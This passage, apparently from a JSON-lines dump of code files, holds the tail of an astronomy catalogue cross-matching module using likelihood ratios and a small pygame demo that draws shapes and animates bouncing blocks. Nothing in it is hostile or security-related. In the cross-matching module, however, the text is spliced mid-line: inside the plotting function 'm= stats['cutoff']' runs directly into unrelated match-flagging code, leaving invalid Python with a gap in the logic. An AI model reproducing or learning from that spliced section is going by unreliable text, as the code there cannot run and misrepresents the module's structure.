rel_array[:, i] = lr_table['REL_' + col]\n pa_array[:, i] = lr_table['p_any_' + col]\n pi_array[:, i] = lr_table['p_i_' + col]\n names.append(col)\n names=np.array(names)\n idx_pbest = np.argmax(pa_array, axis=1)\n #print(idx_pbest)\n #print(names[idx_pbest])\n uidx_pbest = (np.arange(len(lr_table)), idx_pbest)\n\n lr_table['LR_BEST'] = lr_array[uidx_pbest]\n lr_table['REL_BEST'] = rel_array[uidx_pbest]\n lr_table['LR_BEST_MAG'] = [names[i].encode('utf8')\n for i in idx_pbest]\n lr_table['prob_has_match'] = pa_array[uidx_pbest]\n lr_table['prob_this_match'] = pi_array[uidx_pbest]\n\n\n def plot_stats(self, stats, ext):\n \n import matplotlib.pyplot as plt\n from matplotlib.backends.backend_pdf import PdfPages\n from matplotlib.ticker import MultipleLocator, FormatStrFormatter\n\n plotfile = os.path.join(self.MHDR, self.dirs['FIELDS'], self.id, 'LR', 'stats-{}_{}.pdf'.format(self.id, ext))\n \n fontPanel = {'family': 'serif',\n 'color': 'black',\n 'weight': 'bold',\n 'size': 10,} \n\n figall=[]\n pdf = PdfPages(plotfile)\n fig, ax = plt.subplots(1,1)\n y= stats['completeness']\n x= stats['cutoff']\n ax.plot(x,y, 'r-', label=\"completeness\") \n y= stats['reliability']\n ax.plot(x,y, 'b--', label=\"purity\") \n \n for axis in ['top','bottom','left','right']:\n for a in [ax]:\n a.spines[axis].set_linewidth(2)\n a.tick_params(labelsize=12)\n a.xaxis.set_tick_params(which='major', width=1.5, size=8)\n a.yaxis.set_tick_params(which='major', width=1.5, size=8)\n a.xaxis.set_tick_params(which='minor', width=1.5, size=5)\n a.yaxis.set_tick_params(which='minor', width=1.5, size=5)\n \n xmax=3\n m= stats['cutoff'] prob_ratio_secondary\n mask = np.logical_and(~mask, mask_ratio)\n match['match_flag'][mask] = 2\n\n ## Flag as secondary matches with multiple counterparts\n ## with LR_BEST == 0 and pi_max == 0\n mask = np.logical_and(match['ncat'] > 1, match['LR_BEST'] == 0.0)\n mask = np.logical_and(mask, pi_max == 0)\n match['match_flag'][mask] = 2\n\n return match\n\n def _sort(self, match):\n # Sort final table as the primary catalogue.\n # We need to pass the column in pcat with the source ids.\n return self._sort_as_pcat(match, match.colnames[0])\n\n ### ===\n\n def _match_rndcat(self, **kwargs):\n # Cross-match secondary catalogue with a randomized\n # version of the primary catalogue\n original_pcat = deepcopy(self.pcat)\n self.pcat = self.pcat.randomise(numrepeat=1)\n\n # Hide std ouput of lr match\n with redirect_stdout(open(os.devnull, \"w\")):\n mcat_pidx, mcat_sidx, mcat_d2d = self._candidates()\n\n lr, _ = self._likelihood_ratio(mcat_pidx, mcat_sidx, mcat_d2d)\n\n # The value for prob_ratio_secondary doesn't matter here,\n # because secondary matches are not used for the statistics\n match_rnd = self._final_table(lr, prob_ratio_secondary=0.5)\n\n # Recover original pcat\n self.pcat = original_pcat\n\n return match_rnd\n\n def _match_fake(self, candidates, **kwargs):\n # Cross-match a randomized version of the primary catalogue\n # with a secondary catalogue where fake counterparts for the primary\n # have been introduced. This is for calculating statistics using\n # the Broos et al. 2006 method.\n original_pcat = deepcopy(self.pcat)\n original_scat = deepcopy(self.scat)\n\n self.pcat = self.pcat.randomise(numrepeat=1)\n\n # Create a set of fake counterparts for the primary catalogue\n fakes = self.pcat.set_fake_counterparts(candidates)\n\n # Remove candidates from the secondary catalogue\n scat_nocandidates = self.scat.remove_by_id(candidates.ids)\n\n # Set as secondary catalogue the union of the candidates-removed\n # secondary catalogue with the catalogue of fake counterparts\n self.scats[0] = scat_nocandidates.join(fakes)\n\n # Hide std ouput of lr match\n with redirect_stdout(open(os.devnull, \"w\")):\n mcat_pidx, mcat_sidx, mcat_d2d = self._candidates()\n\n lr, _ = self._likelihood_ratio(mcat_pidx, mcat_sidx, mcat_d2d)\n\n # The value for prob_ratio_secondary doesn't matter here,\n # because secondary matches are not used for the statistics\n match_rnd = self._final_table(lr, prob_ratio_secondary=0.5)\n\n # Recover original catalogues\n self.pcat = original_pcat\n self.scats[0] = original_scat\n\n return match_rnd\n","sub_path":"astromatch/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":31171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38222782","text":"import pygame, sys, time\nfrom pygame.locals import *\nimport random as r\nimport math as m\n\nclass myPygame:\n\n pDef = {\n 'BLACK' : (0, 0, 0),\n 'WHITE' : (255, 255, 255),\n 'RED' : (255, 0, 0),\n 'GREEN' : (0, 255, 0),\n 'BLUE' : (0, 0, 255),\n 'WIDTH' : 500,\n 'HEIGHT' : 400\n }\n\n def __init__(self, **kwargs):\n for arg, value in kwargs.items():\n if arg not in myPygame.pDef:\n raise ValueError('%s not a valid param for tsPlot()' % arg)\n myPygame.pDef[arg] = value\n \n for arg, value in myPygame.pDef.items():\n setattr(self, arg, value)\n\n # set up pygame\n self.movingBlocks()\n \n def shapesExample(self): \n pygame.init()\n # set up the window\n windowSurface = pygame.display.set_mode((self.pDef['WIDTH'], self.pDef['HEIGHT']), 0, 32)\n pygame.display.set_caption('Hello world!')\n # set up the colors\n # set up fonts\n basicFont = pygame.font.SysFont(None, 48)\n # set up the text\n text = basicFont.render('Hello world!', True, self.pDef['WHITE'], self.pDef['BLUE'])\n textRect = text.get_rect()\n textRect.centerx = windowSurface.get_rect().centerx\n textRect.centery = windowSurface.get_rect().centery\n # draw the white background onto the surface\n windowSurface.fill(self.pDef['WHITE'])\n # draw a green polygon onto the surface\n pygame.draw.polygon(windowSurface, self.pDef['GREEN'], ((146, 0), (291, 106), (236, 277), (56, 277), (0, 106)))\n # draw some blue lines onto the surface\n pygame.draw.line(windowSurface, self.pDef['BLUE'], (60, 60), (120, 60), 4)\n pygame.draw.line(windowSurface, self.pDef['BLUE'], (120, 60), (60, 120))\n pygame.draw.line(windowSurface, self.pDef['BLUE'], (60, 120), (120, 120), 4)\n # draw a blue circle onto the surface\n pygame.draw.circle(windowSurface, self.pDef['BLUE'], (300, 50), 20, 0)\n # draw a red ellipse onto the surface\n pygame.draw.ellipse(windowSurface, self.pDef['RED'], (300, 250, 40, 80), 1)\n # draw the text's background rectangle onto the surface\n pygame.draw.rect(windowSurface, self.pDef['RED'], (textRect.left - 20, textRect.top - 20, textRect.width + 40, textRect.height + 40))\n # get a pixel array of the surface\n pixArray = pygame.PixelArray(windowSurface)\n pixArray[479][380] = self.pDef['BLACK']\n pixArray[480][380] = self.pDef['BLACK']\n pixArray[481][380] = self.pDef['BLACK']\n pixArray[479][379] = self.pDef['BLACK']\n pixArray[480][379] = self.pDef['BLACK']\n pixArray[481][379] = self.pDef['BLACK']\n pixArray[479][381] = self.pDef['BLACK']\n pixArray[480][381] = self.pDef['BLACK']\n pixArray[481][381] = self.pDef['BLACK']\n del pixArray\n # draw the text onto the surface\n windowSurface.blit(text, textRect)\n # draw the window onto the screen\n pygame.display.update()\n # run the game loop\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n def movingBlocks(self):\n # set up pygame\n pygame.init()\n # set up the window\n windowSurface = pygame.display.set_mode((self.pDef['WIDTH'], self.pDef['HEIGHT']), 0, 32)\n pygame.display.set_caption('Animation')\n # set up direction variables\n DOWNLEFT = 1\n DOWNRIGHT = 3\n UPLEFT = 7\n UPRIGHT = 9\n MOVESPEED = 4\n # set up the block data structure\n b1 = {'rect':pygame.Rect(300, 80, 50, 100), 'color':self.pDef['RED'], 'dir':UPRIGHT}\n b2 = {'rect':pygame.Rect(200, 200, 20, 20), 'color':self.pDef['GREEN'], 'dir':UPLEFT}\n b3 = {'rect':pygame.Rect(100, 150, 60, 60), 'color':self.pDef['BLUE'], 'dir':DOWNLEFT}\n blocks = [b1, b2, b3]\n # run the game loop\n while True:\n # check for the QUIT event\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n # draw the black background onto the surface\n windowSurface.fill(self.pDef['BLACK'])\n for b in blocks:\n # move the block data structure\n if b['dir'] == DOWNLEFT:\n b['rect'].left -= MOVESPEED\n b['rect'].top += MOVESPEED\n if b['dir'] == DOWNRIGHT:\n b['rect'].left += MOVESPEED\n b['rect'].top += MOVESPEED\n if b['dir'] == UPLEFT:\n b['rect'].left -= MOVESPEED\n b['rect'].top -= MOVESPEED\n if b['dir'] == UPRIGHT:\n b['rect'].left += MOVESPEED\n b['rect'].top -= MOVESPEED\n # check if the block has move out of the window\n if b['rect'].top < 0:\n # block has moved past the top\n if b['dir'] == UPLEFT:\n b['dir'] = DOWNLEFT\n if b['dir'] == UPRIGHT:\n b['dir'] = DOWNRIGHT\n if b['rect'].bottom > self.pDef['HEIGHT']:\n # block has moved past the bottom\n if b['dir'] == DOWNLEFT:\n b['dir'] = UPLEFT\n if b['dir'] == DOWNRIGHT:\n b['dir'] = UPRIGHT\n if b['rect'].left < 0:\n # block has moved past the left side\n if b['dir'] == DOWNLEFT:\n b['dir'] = DOWNRIGHT\n if b['dir'] == UPLEFT:\n b['dir'] = UPRIGHT\n if b['rect'].right > self.pDef['WIDTH']:\n # block has moved past the right side\n if b['dir'] == DOWNRIGHT:\n b['dir'] = DOWNLEFT\n if b['dir'] == UPRIGHT:\n b['dir'] = UPLEFT\n # draw the block onto the surface\n pygame.draw.rect(windowSurface, b['color'], b['rect'])\n # draw the window onto the screen\n pygame.display.update()\n time.sleep(0.02)\n\n \nif __name__ == \"__main__\":\n game = myPygame()\n","sub_path":"myPygame/myGame.py","file_name":"myGame.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}